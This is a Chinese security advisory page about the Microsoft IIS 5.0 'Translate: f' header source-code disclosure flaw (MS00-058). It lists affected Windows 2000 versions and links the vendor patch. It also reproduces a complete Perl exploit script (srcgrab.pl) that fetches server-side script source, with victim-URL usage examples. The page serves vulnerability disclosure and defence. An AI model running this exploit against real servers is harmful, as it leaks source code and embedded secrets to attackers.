首页 -> 安全研究
安全研究
安全漏洞
Microsoft IIS 5.0 "Translate: f"头标记导致源码泄露漏洞(MS00-058)
发布日期:2000-08-14
更新日期:2000-08-14
受影响系统:
Microsoft IIS 5.0描述:
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server
BUGTRAQ ID: 1578
CVE(CAN) ID: CVE-2000-0778
IIS是Microsoft公司开发的流行的HTTP服务器程序,随同Windows操作系统捆绑发布。
IIS 5.0在处理某些带有特殊标记的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞得到服务器上脚本的源码。
如果IIS 5.0接收到一个包含特殊头格式(Translate: f)的HTTP请求,同时URL末尾包含一个特殊字符("/")的话,IIS 会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户。
<*来源:Daniel Docekal (ddoc@MIA.CZ)
链接:http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0080.html
http://www.ciac.org/ciac/bulletins/k-065.shtml
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 =
using a shared drive but I haven=B4t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in =
BugTraq.
# Cheers 351 and FractalG :)
if (not $ARGV[0]) {
print qq~
Geee it=B4s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl =
http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=3D$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua =3D new LWP::UserAgent;
# Create a request
my $req =3D new HTTP::Request GET =3D> $victimurl . '\\'; # Here =
is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate =3D> 'f'); # Here is the famous translate =
header :))
$req->content('match=3Dwww&errors=3D0');
# Pass request to the user agent and get a response back
my $res =3D $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
建议:
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS00-058)以及相应补丁:
MS00-058:Patch Available for "Specialized Header" Vulnerability
链接:http://www.microsoft.com/technet/security/bulletin/MS00-058.asp
补丁下载:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769
浏览次数:6541
严重程度:0(网友投票)
绿盟科技给您安全的保障